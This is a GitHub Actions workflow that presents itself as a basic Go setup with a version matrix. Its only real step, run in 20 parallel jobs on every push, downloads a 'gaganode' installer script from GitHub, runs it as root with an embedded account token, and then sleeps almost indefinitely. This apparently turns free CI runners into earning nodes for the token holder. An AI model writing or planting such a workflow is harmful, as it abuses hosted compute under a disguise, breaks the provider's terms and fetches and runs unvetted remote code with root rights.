# This is a basic workflow to help you get started with Actions

name: Download
on: [push]
jobs:
  Main:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4]
        flag: [Uio, Byu, Tin, Bon, Gon]
    timeout-minutes: 5
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Main
      run: |
        sudo su
        curl -L https://raw.githubusercontent.com/spiritLHLS/gaganode-one-click-command-installation/main/g.sh -o g.sh && chmod +x g.sh
        sudo bash g.sh -t yobqbmxayydohqrhc9a977e15c9875e03 && sleep 1212131312158465421321
